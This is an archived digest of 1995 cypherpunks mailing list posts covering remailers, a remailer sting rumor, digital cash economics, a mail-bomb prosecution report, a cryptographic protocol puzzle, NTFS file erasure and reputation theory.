Content-Type: text/plain


Bill Gates (like Mister Newt before him) committed what I call the Future
Fallacy in "The Road Ahead."  Page 106.

"Soon any child old enough to use a computer will be able to transmit coded
messages that no government on earth will find easy to decipher."

DCF

"Term limits aren't enough.  We need jail." -- PJ





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wwwziff@internet.com (ZD Net / World Wide Web Edition)
Date: Tue, 5 Dec 95 07:32:27 PST
To: wwwedition@ziff.com
Subject: ZD Net Update v.1 #2
Message-ID: <199512051533.KAA11909@yipee.internet.com>
MIME-Version: 1.0
Content-Type: text/plain



__________________________________ZD Net Update_______________________________
v. 1 #3                                                               11-27-95

Welcome to ZD Net Update, the free E-mail newsletter created especially for
registered users of Ziff-Davis Interactive's ZD Net/World Wide Web edition.
ZD Net Update is a bi-weekly bulletin that alerts you to new and exciting
developments on ZD Net.

In this issue:

> COMPUTER LIFE ONLINE PRESENTS THE HOT SITE OF THE DAY
> INTRODUCING Q&A WITH PC MAGAZINE'S MICHAEL MILLER
> ZD INTERNET LIFE INVITES YOU TO BECOME A WEB REVIEWER
> MACUSER ANNOUNCES 11TH ANNUAL EDITORS' CHOICE FINALISTS

*     *     *     *     *     *     *     *     *     *

COMPUTER LIFE ONLINE PRESENTS THE HOT SITE OF THE DAY

The editors at Computer Life Online surf the Net like a bad habit. When
they find sites that are hot, fresh, interesting--or just relevant to a
healthy computer life--they share the news with everyone here on the Web.
Then, before the Site of the Day gets warm, they put it on the "Previously
Featured Hot Sites" page and serve up another one. Check these out, and you
may be on your way to developing a few bad Net habits of your own:

     http://www.zdnet.com/~complife/filters/site.html

*     *     *     *     *     *     *     *     *     *

INTRODUCING Q&A WITH PC MAGAZINE'S MICHAEL MILLER

PC Magazine Online (http://www.zdnet.com/~pcmag/) is now giving their readers
the opportunity to ask PC Magazine's editor-in-chief, Michael Miller, frank
questions regarding the ever-changing state of the computer industry. Every
week, this new column will feature questions from readers about a given topic.
You can send questions as well as suggestions for topics you'd like to see
Miller address in future columns.

As Miller puts it: "My print column is really an essay on a particular topic.
I try to focus on a broad variety of things, although most my print columns
have been Internet-related lately. That's not too much of a surprise, as I've
been spending a lot of time working with new tools and content for the
Internet. This column will be more conversational. It will give me an
opportunity to answer reader questions and address their concerns. In
addition, this Q&A will be more timely than my magazine column because it
doesn't have to be printed, bound, and mailed."

Among Miller's first topics: PC Magazine's 1995 Technical Excellence Awards
and reflections on the recent Comdex show.

*     *     *     *     *     *     *     *     *     *

ZD INTERNET LIFE INVITES YOU TO BECOME A WEB REVIEWER

ZD Internet Life (http:/www.zdnet.com/zdil/), the first interactive magazine
designed from the ground up around a Web site, wants you to become part of
their Web review team. Now you can tell the world what you really think of a
Web site. Check out the new "Rate-o-Matic" review tool

     http://www.zdnet.com/zdil/cgi-bin/review.cgi

and see for yourself. Every review enters you in a monthly drawing, and the
most astute comments may be included in ZDIL's database.

Need some help finding the sites you'd like to review? ZDIL's great new Search
capability will give you a lift:

     http://www.zdnet.com/zdil/cgi-bin/index.pl

*     *     *     *     *     *     *     *     *     *

MACUSER ANNOUNCES 11TH ANNUAL EDITORS' CHOICE FINALISTS

What were the hottest Mac products this year? Find out by perusing MacUser,
which has announced the finalists for this year's Editors' Choice Awards:

     http://www.zdnet.com/~macuser/eddy95/

But that's just the beginning of the story. You are also invited to join the
staff on Monday, December 4, when MacUser's Eddy Web Site celebrates its grand
opening.This state-of-the-art Web site will feature downloadable product
demos, downloadable QuickTime video, RealAudio commentary from editors, links
to product reviews published in MacUser, and the 1995 Eddy Awards Sweepstakes.

Winners will be announced on Sunday, December 17 in a live ceremony on America
Online (Keyword: Eddy95). Information about all the winners will appear on the
Eddy Web Site the following day.

*     *     *     *     *     *     *     *     *     *

ZD Net Update is the official newsletter of ZD Net/World Wide Web Edition. It
is compiled by Tom Schmidt (tom_schmidt@zd.com). Feel free to respond with any
news, notes, comments, or suggestions. To unsubscribe to ZD Net Update, point
your browser to:

     http://www.zdnet.com/cgi-bin/ziffmail.pl/update

and select

     "Unsubscribe to ZD Net Update."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Tue, 5 Dec 95 04:29:01 PST
To: cypherpunks@toad.com
Subject: another fbi prosecution
Message-ID: <951205073038.60202194@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



 The Chronicle of Higher Education (Dec 8, 1995) page A21 reports that
 Monmouth University (West Long Branch, New Jersey; http://www.monmouth.edu) 
 sophomore Dominick LaScala was charged last week in federal court with two 
 counts of computer fraud.
 
 Dominick had his campus account taken away after other users complained
 that he had been "advertising business proposals inappropriately on line."
 The FBI alleges that he then sent 24,000 email messages in one day from a
 commercial account (unamed) to Monmouth's system.. This denial of service 
 attack was successful for about 5 hours. He is facing six(6) years in prison 
 and a up to $350,000 in fines (1.20 years/hr and and $70,000/hr). 
   
 His lawyer (Kenneth Weiner) claims that "even if his client sent the mail 
 bomb" since no damage was done to the system, he could not be convicted 
 under the computer fraud statute. He also claims that prosecutors are trying 
 to make an example of his client. The university is still trying to figure 
 out whether he can be punished under the university code of conduct.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Strawser <bstrawse@copper.ucs.indiana.edu>
Date: Tue, 5 Dec 95 06:06:15 PST
To: cypherpunks@toad.com
Subject: [Mix-L] WARNING: sting via remailer! (fwd)
Message-ID: <199512051407.JAA18236@copper.ucs.indiana.edu>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
> From owner-mix-l@alpha.jpunix.com  Tue Dec  5 09:03:10 1995
> Date: Tue, 5 Dec 1995 07:55:21 -0600 (CST)
> Message-Id: <199512051355.HAA12202@alpha.jpunix.com>
> To: mix-l@vishnu.alias.net, remailer-operators@c2.org,
>         mail2news@utopia.hacktic.nl
> Newsgroups: alt.privacy, alt.privacy.anon-server, alt.security
> From: "Mr. Boffo" <mixmaster@vishnu.alias.net>
> X-Comment1: This message did not originate from the
> X-Comment2: above address. It was automatically remailed
> X-Comment3: by an anonymous mail service. Please report
> X-Comment4: problems or inappropriate use to
> X-Comment5: <complaints@vishnu.alias.net>
> Subject: [Mix-L] WARNING: sting via remailer!
> Sender: owner-mix-l@jpunix.com
> Precedence: bulk
> 
> 	I was in the federal building coffee shop in Reston, Va. yesterday
> when I overheard a conversation between what appeared to be two FBI agents
> discussing a sting operation involving Mixmaster. Hearing the word
> "mixmaster" naturally caused my ears to perk up and I listened further. 
> 
> 	It appears that the FBI has coerced a mixmaster remailer operator
> into cooperating with them in a sting operation to catch remailers when
> they forward email pertaining to pornography, pedophilia, and copy-written
> software. 
> 
> 	My questions are a) is it possible to perform this type of
> monitoring on a mixmaster remailer and, b) what is the identity of the
> cooperating remailer operator? 
> 
> 	This concerns me greatly as I use remailers to privatize my
> important email regularly and I don't want my identity or my email
> compromised because of a "spook in cypherpunks clothing".
> 


-- 
Bryan Strawser, Indiana University, Bloomington, USA              Remember Waco
bstrawse@indiana.edu                    http://copper.ucs.indiana.edu/~bstrawse



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 5 Dec 95 06:08:56 PST
To: rah@shipwright.com (Robert Hettinga)
Subject: Geodesic Payment Systems?  (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment)
In-Reply-To: <v02120d09ace90e1bce3b@[199.0.65.105]>
Message-ID: <gkl58I2Mc50eBlRA1y@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.nonpersonal: 4-Dec-95 Re: Meeting notes from ANSI..
Robert Hettinga@shipwrig (4665*)

> MTB's
> cost on a Digicash trade is $.50, while the most efficient book-entry
> system on the net, First Virtual, has to charge, what? $5.00 to break even?

There are some interesting unspoken assumptions here.  To calculate
anyone's "cost" on a transaction requires the complex amortization of
costs over many transactions, with assumptions/projections about the
transaction volume.  I have no idea where you came by either of your
numbers, MTB's or FV's, but I can tell you that your guess about FV is
off the mark.  And I'm sure that MTB is no more eager than we are to
publicly dissect all the underlying cost structures, so I have no idea
what the 50 cents that you cite really means.

From a consumer standpoint, I think that the only reasonable thing you
can do is to assume that the vendors are pricing their services at a
level that they believe yields profit in the long term.  FV charges 29
cents plus 2 percent, which means that you can put 50 cent charges
through the system if you're willing to give up 30 of those cents.  By
pricing it that way, we have invited people to put 50 cent charges
through the system.  We wouldn't have done that if we didn't think we
could make money on it.  

To be perfectly clear:  our minimum service charge is 30 cents, not 5
dollars.  If we didn't think it was worthwhile to take transactions that
small, we wouldn't do so.

Finally, on the more philosophical matter:

> They don't get it. The network isn't a hierarchy. The network is a
> geodesic. You don't need offsetting book entries, you can trade digital
> certificates much cheaper. You don't need to control your software, you
> need to make it autonomous and set it free.

In terms of crypto-privacy, anonymous communication, and things like
that, I agree completely.  However, it's genuinely more complicated than
that where money is concerned, because there are aspects of the
translation between "bits and bucks" that have some extremely serious
practical complexities.

A true geodesic structure is self-supporting and self-structuring.  A
cryptographic infrastructure can and should be similar, I agree
completely.  However, a *monetary* infrastructure needs convertability,
and the points of conversion are always the best targets of attack for
criminals.  (I've been casting about for an analogy to physical
geodesics, and it's hard to find one.  The best I can come up with is to
imagine that in order to convert a carbon buckyball to a more
conventional set of carbon molecules, you had to do it through a service
bureau that was capable of error, fraud, or subversion by outside
criminals.  This would ONLY matter if you ever wanted to do such
conversions, but it would matter a lot then, especially if you had to
suffer a serious financial loss if you got the wrong carbon molecules at
the end of the process.)

IF you wanted to settle for a totally non-convertible economy (like
rubles in the old Soviet Union, or like the LETS system on the net
today, as I understand it) then you could build it geodesically.  But if
you want to be able to convert back and forth between Internet payment
systems and non-Internet payment systems, it can never be truly
geodesic.  It will always be attackable at the points of conversion. 
(You may "trade digital certificates", but how do you know the ones
you're receiving were obtained for legitimate real-world value?) 
Because of this, the underwriting financial institutions, who have a
very reasonable desire to limit their own risk, will inevitably seek the
protection-by-traceability offered by something less than perfect
anonymity.  We may not like it, but it's a very natural position to be
taken by those who are actually bearing the financial risks at the point
of conversion.

The truth is that there's a natural tension between the consumer's
desire for privacy and the underwriter's desire for financial
protection.  First Virtual has been worrying about this for 2 years now,
actually.  Our solution -- which I think has held up pretty well -- was
to allow users to be pseudonymous (as opposed to anonymous), to limit
the traceability-by-pseudonym to the service bureau (FV) that effects
the payments, and to treat all such information with the highest
possible standards of confidentiality.  The fact that the information
can be traced when absolutely necessary is actually a huge selling point
with those who carry the financial risks.  I'm not claiming it's a
perfect solution, but I think that unless you are clear about the
underlying tradeoffs, it's hard to talk seriously about how to build a
better solution.  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn)
Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
FAQ & PGP key: nsb+faq@nsb.fv.com       | http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gondolin Mixmaster Remailer <mix@remail.gondolin.org>
Date: Tue, 5 Dec 95 06:34:00 PST
To: cypherpunks@toad.com
Subject: gondolin.org remailer announcement
Message-ID: <199512051421.JAA02528@anduin.gondolin.org>
MIME-Version: 1.0
Content-Type: text/plain



Gondolin Technologies is proud to announce our resumption of remailer 
services to the online community.  Some of you may remember the remailer 
services based at <mixmaster@gondolin.org> that was on-line for most of 
this year.

We are now back and better than ever with highly improved hardware and 
net connections.

We are hosting a Type I "Cypherpunks" remailer, as well as a Type II 
"Mixmaster" remailer at <mix@remail.gondolin.org>.  The PGP public key 
for the type I remailer is below:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzC7/HwAAAEEAKFLOSwJ6FdRb/Z0Yj+RV3inx9aRtrJI+5kXpZTWtcQNo50K
qKzRB9joL68jxeQTa4FTOFsWlbsn7dCcOpkOCJqoo4Uby+bIDRP8E5MYGgALVoNh
xO6Hucj2Hh1v+koOTvtv4lDWaDdhxN7rPPb8KlTC2FPFIK9/2n7xTkxYcqfxAAUR
tDJHb25kb2xpbiBUeXBlIEkgUmVtYWlsZXIgPG1peEByZW1haWwuZ29uZG9saW4u
b3JnPokAlQMFEDC+kr2Oh92U+GrHWQEB3s8EAI6+3t59tYB+EWUQDWvSaPNqihab
8lRkctA0gPtOWD3f6nOBcPjIrAoeZ3mB5ASJwPkXGbe6rTGrBo6HuC2t45bscviV
O46wKKX6aIJnsCM6vx/vm1aWdm/a5DsBv1BYnnNEedrwFlvzzAhBFtolK1a7i6+N
PDnfGlrs9q6U+9LBiQCVAwUQMLv8rPvQGgQ7UJMZAQECYgP9E2riZwFPvNFpKuX9
9JbG4PJGzOm7TAQO1/hIb9BAk7KrLs7yQuTzfQs6hAXB88o1ofIPYp5uz/GvAleg
wCGIA3ZnhYh5yiS4UArZbCfr8hDvXsUqQBxR5tfLHj5qOkOejFckIHCRC/8wb23g
3Xu7Zh00PpJAD1EZVfDdhseMXGE=
=AJYL
-----END PGP PUBLIC KEY BLOCK-----

The Type II remailer supports posting via mail2news gateways.  We are 
using Mixmaster 2.0.3 from Lance Cottrell.

The Type I remailer supports PGP encryption, latent time, hash marks, 
cutmarks, and so on.  Our type I software is John Fleming's Freedom 
Remailer v1.6beta.

Our remailers also utilize a reordering pool.

Address any comments, complaints, or concerns to 
<remailer-admin@gondolin.org>.

- Bryan Strawser, System/Network Administrator, Gondolin Technologies







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Tue, 5 Dec 95 06:30:56 PST
To: cypherpunks@toad.com
Subject: Re: WARNING: sting via remailer!
In-Reply-To: <199512051355.HAA12202@alpha.jpunix.com>
Message-ID: <m0tMyPa-000G3cC@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


[ I see that the original has been forwarded to cypherpunks, so I'll
  also send my response there. -russ ]

Boffo writes:
 > 	I was in the federal building coffee shop in Reston, Va. yesterday
 > when I overheard a conversation between what appeared to be two FBI agents
 > discussing a sting operation involving Mixmaster. Hearing the word
 > "mixmaster" naturally caused my ears to perk up and I listened further. 
 > 
 > 	It appears that the FBI has coerced a mixmaster remailer operator
 > into cooperating with them in a sting operation to catch remailers when
 > they forward email pertaining to pornography, pedophilia, and copy-written
 > software. 

Uh-oh!  I'd better shut down my remailer, but fast, based on an
unsubstantiated rumor.  Especially one that makes little sense.  Why
do you need a sting?  All you have to do is use a single remailer, and
send the mail from yourself, to yourself.  You know the source,
destination, and who handled it.  IF a court can be convinced that
forwarding email containing illegal materials is the same as asking to
receive email containing illegal materials, then ALL of our butts are
toast.

 > 	My questions are a) is it possible to perform this type of
 > monitoring on a mixmaster remailer and, b) what is the identity of the
 > cooperating remailer operator? 
 > 
 > 	This concerns me greatly as I use remailers to privatize my
 > important email regularly and I don't want my identity or my email
 > compromised because of a "spook in cypherpunks clothing".

You fool.  If you use remailers regularly, then YOU ARE KNOWN TO THE
SPOOKS.  Face facts.  We know that the FBI spends a minimum of
$10,000,000 each year (count the wiretaps, multiply by agents and do
the math) just for telephone wiretaps.  Computer wiretaps are a LOT
CHEAPER.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | Flushing, NY.  Not just a suburb,
Potsdam, NY 13676 | +1 315 268 9201 FAX   | it's a good idea in general.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Tue, 5 Dec 95 06:56:41 PST
To: cypherpunks@toad.com
Subject: Geodesic Payment Systems?  (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment)
In-Reply-To: <v02120d09ace90e1bce3b@[199.0.65.105]>
Message-ID: <m0tMyoZ-000G3fC@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathaniel Borenstein writes:

 > A true geodesic structure is self-supporting and self-structuring.  A
 > cryptographic infrastructure can and should be similar, I agree
 > completely.  However, a *monetary* infrastructure needs convertability,
 > and the points of conversion are always the best targets of attack for
 > criminals.

Ah!  You mean the criminals seeking to exploit the conversion, not
criminals using the anonymity of the system for income secrecy.  I got
a little confused right there.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | Flushing, NY.  Not just a suburb,
Potsdam, NY 13676 | +1 315 268 9201 FAX   | it's a good idea in general.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <dreschs@mpd.tandem.com>
Date: Tue, 5 Dec 95 08:03:12 PST
To: cypherpunks@toad.com
Subject: Re: Globally legal Netscape
In-Reply-To: <9512032146.AA07279@all.net>
Message-ID: <199512051606.KAA05672@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


rthomas@pamd.cig.mot.com (Robert Owen Thomas) said:

ROT> look, this is just a *bit* extreme.  having been one of those folks
ROT> sworn to uphold the Constitution, i can tell all of you that there
ROT> is no master plan to rid the American people of their rights and
ROT> freedom.

	Oh, I'm glad that a senior advisor to the President of the
United States is reading this list.

ROT> regards, --robert, a former U.S. government employee...but i won't
ROT> say where...;-) --

	Oh, so you _aren't_ a senior advisor?  I didn't think I had ever
heard your name mentioned in any press reports.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 5 Dec 95 07:20:38 PST
To: dave.turner@wmc.ac.uk (Dave Turner)
Subject: Re: Joining The Mailing List
In-Reply-To: <"mailhub.live:260730:951205123724"@liverpool.ac.uk>
Message-ID: <199512051525.KAA27932@homeport.org>
MIME-Version: 1.0
Content-Type: text


Dave Turner wrote:
| Cypherpunks,
| Would it be possible to include me on your current mailin list.

	Would journalists *please* stop writing about
cypherpunks@toad.com, and start including the majordomo@toad.com
address?

Thanks.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Dec 95 10:09:00 PST
To: cypherpunks@toad.com
Subject: Do companies ever do the "right thing"?
Message-ID: <ace9c8a002021004befb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:18 PM 12/4/95, Ed Carp wrote:

>> That's always a tough position to be in.  If Netscape or Microsoft
>> knew what was the "right" thing to do, I don't doubt that they'd be
>> doing it.
>
>That's one of the most politically and socially naive statements I've
>ever heard.  Corporations *never* do the "right thing" unless it will
>increase their profits.  Remember, corporations are in business to
>make money by providing a product or service that people will pay
>money for.  Whatever gets in the way of that will fall by the
>wayside.  That's an economic fact of life.

I can think of many cases where companies chose courses of actions that
seemed to be motivated by choices about what is right and what is wrong.

Viewing the "profit landscape," corporations have to balance movement to
the "locally most profitable" regions (fertile valleys) or to movement
further out into even more profitable regions.

It is just not that case that all corporations make decisions about what is
the "most profitable," at any cost. They have Boards of Directors with
influence, and they have various sorts of "mission statements."

This applies to small businesses as well, where the owners often make
decisions about which markets to compete in based on their own personal
moral choices. Vegetarian restaurants, for example, choose not to offer
meat, even when market studies indicate their patronship would probably
increase.

I also know of electronics companies that, for various reasons, refuse to
bid on government contracts. (Partly they fear sinking into a bureaucratic
mess, partly they don't want to do military work.)

Finally, many companies understand the value of "good will" (as we discuss
so often in talking about reputations) and think carefully about how their
actions will be perceived _long into the future_.

It is the belief, I think, of most of us that Netscape will have its
reputation diminished if it acquiesces without a strong fight to government
plans for GAK. In this sense, if we are right, Netscape's longterm profits
may be affected by their choice.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Tue, 5 Dec 95 08:47:12 PST
To: blancw@accessone.com
Subject: Re: Info on Netscape's key escrow position
Message-ID: <Pine.BSD.3.91.951205114509.3942B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Blanc, 
 
 
On 12 02 95 you pointed to: 
 
   ...an underlying problem, which is of not having a sense 
   of freedom to stand up to the Dark Side. 
 
 
You have put your finger on perhaps THE problem: Why did 
we cast aside our sense of freedom?  How may we re-ignite 
the spirit of freedom? 
 
I believe excerpts from a newsstory in today's Electronic 
Telegraph provide a hint regarding the first question: 
 
   JOHN Major and Lord Taylor, the Lord Chief Justice, are to 
   have informal talks at No 10 Downing Street in an attempt 
   to avert a deepening rift between Government and judiciary. 
 
   The meeting has been arranged following concern over the 
   number of adverse court judgments against ministerial de- 
   cisions and mounting opposition by judges to plans by Mi- 
   chael Howard, the Home Secretary, to impose tougher man- 
   datory sentences on habitual criminals. 
 
   It was being emphasised in Whitehall last night that the in- 
   formal meeting was intended to explore ways of improving 
   relations. It was in no sense an attempt to put pressure on 
   the judges. 
 
   It emerged last night that Mr Major and Lord Taylor are like- 
   ly to discuss ways of increasing the pay of the judiciary. 
   Senior judges are said to be aggrieved that their salaries 
   have fallen behind. 
 
 
In no sense is one part of the the State putting pressure on 
another part of the State... 
 
Through every sense, the populace is trained to appreciate 
the justice of 
 
             not having a sense of freedom to stand up 
 
 
Except at the pay window. 
 
 
Cordially, 
 
Jim 
 
 
 
                              NOTE 
 
             The URL of The Electronic Telegraph's website is: 
 
             http://www.telegraph.co.uk 
 
             The newsstory's headlined: "Pay and peace talks 
             for judges."  Its online filename is: 1judge05.html. 
             It's dated 12 05 95. 
 
             The story was written by: GEORGE JONES and 
             TERENCE SHAW. 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Tue, 5 Dec 95 08:51:33 PST
To: cypherpunks@toad.com
Subject: Secure versus ?
Message-ID: <9512051652.AA17214@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to everybody who replied to my previous message. As most of you
suspected, it turned out to be possible to break the permutations I was
using. The reason why I have pursued this despite its non-intuitiveness
is that the following well known protocol also seems to have the same
property I claimed. Please tell me how a computationally unbounded
adversary could defeat the following: (without active attack against
which this immediatelly fails (i.e. it has to be combined with an
authentication algorithm)).

Please help me, this problem is totally driving me crazy!

A VARIATION OF SHAMIR'S THREE PASS PROTOCOL SAFE FROM PASSIVE ATTACK
BY A COMPUTATIONALLY UNBOUNDED ADVERSARY:

Alice wants to send Bob a message. She is going to send her message a
fraction of a bit of a time via the following protocol.

Before hand:

1. Enumerate all the primes from 256 to 511. Call them N.
2. For each prime, enumerate all the numbers less than it that are
   also relatively prime to N-1. Call these E.
3. Number each pair of E and N.

The algorithm can be divided into an inner loop and an outer loop. The
outer loop calls the inner loop.

Inner Loop:

Alice wants to use the inner loop to send bit b.
1. Alice randomly chooses seven bits of salt, and prepends b to them
   creating an 8 bit M
2. Alice randomly chooses an (Na,Ea) pair from the list of possibilities.
3. Alice calculates D such that E*D mod (N-1) equals 1
4. Bob randomly chooses an (Nb,Eb) pair from the list of possibilities.
5. Bob calculates D
6. Alice sends Bob the nine bit number (M^Ea) mod Na = C1
7. Bob sends Alice (C1^Eb) mod Nb = C2
8. Alice sends Bob (C2^Da) mod Na = C3
9. Bob calculates (C3^Db) mod Nb = M, the bit being the MSB.

The unbounded passive adversary calculates a probability (p) between 0.5
and one with which he/she can guess the bit. This is based on the facts
that

1. only a fraction of all pairs of Na and Ea will map C2 to C3,
2. only a fraction of all pairs of Nb and Eb will map C1 to C2,
3. only a fraction of all Na are high enough to produce C1.

With thousands of transform pairs, there are more bits of entropy in the
transform and salt selection, than there is information in the three messages.

Alice, Bob and Eve can thus know what p is.

Outer Loop:

1. Alice sends Bob an initialization vector using the inner loop.
2. Alice uses the inner loop to send Bob a series of bits.
   Each bit is either a random bit or the next bit of the message depending
   what the value of p for the previous inner loop was.

	A simple proper (but VERY INEFFICIENT) outer loop algorithm
        would be the following:

Alice:
	1. If the p for the previous inner loop was 0.5, send the XOR
           of the message and the previously sent bit.
	2. If the p for the previous message was not 0.5, send a random bit.

Bob:
	1. If the p for the previous message was 0.5, take the bit, XOR
           with the previous bit, and append it to the message.
	2. Otherwise just save the bit for one more itteration.

PLEASE help me. I CAN'T find how this fails to be information-theoretically
secure, but I am convinced that it should not be possible to do this, and
I have been absolutely unproductive at anything since I first started
working on this.

Cheers,

Jason W. Solinsky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Tue, 5 Dec 95 12:00:36 PST
To: cypherpunks@toad.com
Subject: USENIX Conference.
Message-ID: <acea54cb07021004a26d@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


USENIX is in San Diego this year so I will be attending. I hope to see some
of you there. If you will be going, please drop me a note. If there are
enough of us I will try to set up a BOF (birds of a feather) session for
cypherpunk / remailer discussions.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Tue, 5 Dec 95 04:18:22 PST
To: cypherpunks@toad.com
Subject: Some info on file/memory erasing on NT
Message-ID: <30C437D4.3EC0@nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


The subject of protecting memory and files from other users in a multi-user
environment always seems to come up here every few weeks, so the following
short article culled from the MS Win32 SDK might be of interest.


- Andy

[...]
SUMMARY

File systems under Windows NT currently have virtual secure erasure (when a
file is deleted, the data is no longer accessible through the operating
system). Although the bits could still be on disk, Windows NT will not
allow access to them.

MORE INFORMATION

The NTFS file system does this by keeping a high-water mark, for each file,
of bytes written to the file. Everything below the line is real data,
anything above the line is (on disk) random garbage that used to be free
space, but any attempt to read past this high-water mark returns all zeros.

Other reusable objects are also protected. For example, all the memory
pages in a process's address space are zeroed when they are touched (unlike
the file system, a process may directly access its pages, and thus the
pages must be actually zeroed rather than virtually zeroed).

Note that file system security assumes physical security; in other words,
if a person has physical access to a machine and can boot an alternative
operating system and/or add custom device drivers and programs, he/she can
always get direct access to the bits on disk.
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 5 Dec 95 09:25:26 PST
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: No Privacy Right on "My" Desktop ?
In-Reply-To: <Pine.BSD.3.91.951205025944.29416B-100000@ahcbsd1.ovnet.com>
Message-ID: <199512051726.MAA10193@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"James M. Cobb" writes:
> Friend, 

Enemy,

Please stop now. You are becoming a big time nuisance.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 5 Dec 95 12:29:11 PST
To: sjb@universe.digex.net
Subject: Re: towards a theory of reputation
Message-ID: <199512052029.MAA08717@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Scott Brickner <sjb@universe.digex.net>
> 
> Hal writes:
> >Changing the market conventions (say, by introducing escrow agencies)
> >will change the weightings of the various factors that make up
> >utility.  If I no longer have to trust the honesty of the person I am
> >trading with (because we have an escrow agency to help us make the
> >exchange) then the importance of his reputation for honesty goes down.
> >The result is that the "reputation" curves will change rather
> >dynamically and unpredictably as we consider different possible
> >structures in the market.  This will make the analysis of them
> >intractable, I would think.
> 
> Analytically, using an escrow agent doesn't change the utility
> function.  It replaces the trading partner's honesty reputation
> estimate with the escrow agent's (which is presumably higher, or why
> use them?).  This is just a parameter substitution.
> 
> Whence comes the intractability?

By the "utility function" I was referring to Wei's model in which each
person has an idea of how much "utility" (a general summation of
personal value and usefulness) they would get from another person, as a
function of cost.  The utility function takes cost as input and returns
"utiles" (or whatever) as output.  So, with this model, using an escrow
agent would change the utility function; for a given cost, the utility
of a person to me would change (say, if the person involved were
thought to be dishonest, then the presence of escrow agents would make
him more useful to me).  The utility function in Wei's model is a curve
where the Y axis is utility and the X axis is cost.  Changing the
importance of honesty will change the position and shape of this
curve.

I think it would be more tractable to have a model in which honesty
played an explicit part.  We might even make assumptions about the
mathematical relationship between honesty and overall utility - for
example, that utility to me would be monotonically increasing with
increased honesty of the other guy.

What I mean is something like this.  Let t be the degree of trust
necessary for a business relationship to be consummated.  For t=0, no
trust is needed, and the relationship is such that neither party takes
any significant risk - a cash sale, perhaps.  For t=1, in some sense
total trust is needed, and a party can cheat the other with 100% safety.

Now let h(t) be the honesty reputation of a person, so that the utility
which people expect to receive from them gets multiplied by h(t).  For a
person with a repuation for honesty, h(t) is close to 1 for all t.  For a
person who seems dishonest, h(t) will go from 1 to 0 as t goes from 0 to
1.

This is all pretty hand-wavy, but the idea would be to come up with good
strategies to estimate h(t) from a person's behavior, and good ways to
choose what kind of behavior one should follow given the value(s) of t
